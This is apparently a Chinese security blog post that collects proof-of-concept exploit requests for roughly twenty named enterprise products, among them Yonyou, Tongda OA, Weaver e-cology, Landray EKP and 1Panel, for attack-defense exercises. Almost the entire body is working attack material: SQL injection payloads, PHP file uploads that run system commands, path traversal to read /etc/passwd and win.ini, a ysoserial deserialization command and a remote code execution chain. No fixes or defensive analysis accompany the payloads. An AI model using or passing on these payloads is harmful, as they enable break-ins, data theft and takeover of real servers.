2024 HW POC（三）

admin

139584
文章

114
评论

2024年7月26日12:46:13评论154 views字数 8062阅读26分52秒阅读模式

点击上方蓝字关注我们

原创声明

用友U8cloud MeasQueryConditionFrameAction 接口SQL注入漏洞

GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.meas urequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID =1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

金和OA C6 GeneralXmlhttpPage.aspxSQL注入漏洞

GET /C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralXmlhttpPage.aspx/?id =%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4 HTTP/1.1Host:

通达OA V11.10 login.php SQL注入漏洞

POST /ispirit/interface/login.php HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.855.2 Safari/537.36 Content-Type: application/x-www-form-urlencodedHost:Content-Length: 107name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1% 3d0,1,(select+~0%2b1))+limit+0,1))--+'

科讯校园一卡通管理系统 get_kq_tj_today SQL注入漏洞

GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close

科讯校园一卡通管理系统 dormitoryHealthRanking SQL 注入漏洞

GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A 0%3A5%27-- HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9

云课网络科技有限公司云课网校系统 uploadImage接口任意文件上传漏洞

POST /api/uploader/uploadImage HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Cache-Control: no-cacheConnection: keep-aliveContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m x-requested-with: XMLHttpRequestHost: Content-Length: 203------WebKitFormBoundaryLZbmKeasWgo2gPtUContent-Disposition: form-data; name="file"; filename="1G3311040N.php" Content-Type: image/gif<?php phpinfo();?> ------WebKitFormBoundaryLZbmKeasWgo2gPtU--

WVP视频平台 push/list 未授权SQL注入漏洞

GET /api/push/list?page=1&count=15&query=1'&pushing=&mediaServerId= HTTP/1.1Host:

致远OA ucpcLogin接口身份鉴权绕过漏洞

POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host:UserAgentFrom=iphone&login_username=audit-admin&login_password=seeyon123456

Bazarr swaggerui组件目录穿越导致任意文件读取漏洞

GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host:

用友NC及U8cloudLoggingConfigServlet接口反序列化漏洞

使用 ysoserial 生成序列化数据

java -jar ysoserial.jar CommonsCollections6 "calc.exe" > obj.bin

POST /servlet/~ic/nc.bs.logging.config.LoggingConfigServlet HTTP/1.1 Host:payload

泛微e-cology9 /services/WorkPlanService前台SQL注入漏洞

POST /services/WorkPlanService HTTP/1.1HOST:Content-Length: 430Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9SOAPAction:Content-Type: text/xml;charset=UTF-8Host: 192.168.52.168Referer: http://192.168.52.168:80/services/WorkPlanService Cookie: ecology_JSessionid=aaawzto5mqug94J9Fz0cz Connection: close<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn"><soapenv:Header/> <soapenv:Body><web:deleteWorkPlan><!--type: string--> <web:in0>(SELECT 8544 FROM(SELECT(SLEEP(3-(IF(27=27,0,5)))))NZeo)</web:in0> <!--type: int--><web:in1>22</web:in1> </web:deleteWorkPlan></soapenv:Body> </soapenv:Envelope>

1Panel 远程代码执行漏洞

GET /.git/config HTTP/1.1User-Agent: test',"test", "test", "", "YmxvZy5tbzYwLmNu", "test", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/test/index/test.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();');# Connection: closeHost:

飞讯云 WMS /MyDown/MyImportData 前台 SQL 注入漏洞

GET /MyDown/MyImportData?opeid=72000301' HTTP/1.1 Host:Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7Cookie: JSESSIONID=48887e3b-7976-4804-bb6c-17005cad41b1; Language=zh-CNConnection: close

数字通云平台智慧政务 time SQL注入漏洞

GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=%28SELECT+4655 +FROM+%28SELECT%28SLEEP%285%29%29%29usQE%29 HTTP/1.1Host:User-Agent : Mozilla/5 .0 (Windows NT 10 .0; Win64; x64) AppleWebKit/537 .36 (KHTMAccept-Encoding : gzip, deflateAccept : */*Connection : keep-alive

资管云 comfileup.php 前台文件上传漏洞

POST /comfileup.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,* /*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflateConnection: closeCookie: cna=JtMCH7NgWFYCAXBg5XNzopCeUpgrade-Insecure-Requests: 1Priority: u=1Content-Type: multipart/form-data; boundary=--------1110146050 Content-Length: 117----------1110146050Content-Disposition: form-data; name="file";filename="test.php"test ----------1110146050--

蓝凌 EKP 远程代码执行漏洞

1、移动目录

GET /ekp/sys/ui/sys_ui_component/sysUiComponent.do?method=replaceExtend&ex tendId=../../../../resource/help/km/review/&folderName=../../../ekp/sys/common HTTP/1.1Host:

2、利用 dataxml.jsp 执行任意代码

POST /ekp/resource/help/km/review/dataxml.jsp HTTP/1.1 Host:Content-Type: application/x-www-form-urlencodeds_bean=sysFormulaSimulateByJS&script=var x = Function/**/('return(java.lang.Runtime.getRuntime())')();x.exec("calc.exe");var a = mainOutput();function mainOutput() {};

赛蓝企业管理系统 DownloadBuilder 任意文件读取漏洞

GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.config HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,* /*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, brConnection: close

SuiteCRM responseEntryPoint SQL 注入漏洞

GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+S ELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1Host:

用友 U8CRM import.php 任意文件上传漏洞

POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1 Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundarye0z8QbHs79gL8vW5Content-Length: 295------WebKitFormBoundarye0z8QbHs79gL8vW5 Content-Disposition: form-data; name="xfile"; filename="1.xls"<?php system("whoami");unlink(__FILE__);?>------WebKitFormBoundarye0z8QbHs79gL8vW5 Content-Disposition: form-data; name="combo"rce.php ------WebKitFormBoundarye0z8QbHs79gL8vW5--

宏脉医疗DownLoadServerFile任意文件读取下载漏洞

P0ST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept-Encoding: gzip, deflatefilePath=c:windowswin.ini

2024 HW POC（三）

扫码关注hw交流群

2024 HW POC（三）

本公众号所发布的文章仅代表作者个人观点，不代表本公众号立场。文章中的内容、图片、视频等资料，未经许可，不得用于商业用途。

转载或引用本公众号内容时，需注明来源，并保留本公众号的版权信息。

对于侵犯本公众号版权的行为，我们将保留采取法律手段追究的权利。

免责声明

本公众号提供的信息仅供参考，不构成任何形式的投资建议或专业意见。我们不对因使用本公众号内容而产生的任何损失承担责任。

原文始发于微信公众号（攻防实战指南）：2024 HW POC（三）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

2024 HW POC（三）

钓鱼邮件：别慌！老司机教你几招反杀

如何利用图像验证技术识别钓鱼攻击？

HVV重点保障工作清单

实战 | 记一次某地HVV中的木马逆向分析

如何筹备网络安全攻防演练工作

【红队思路】钓鱼-资源捆绑Bypass国内AV

护网5年0失陷，全靠封IP

护网主防照着这份清单执行，红队只能等着下课

记录某地市HW绕WAF后BYpass

利用DeepSeek开展钓鱼邮件演练

发表评论

在线咨询

微信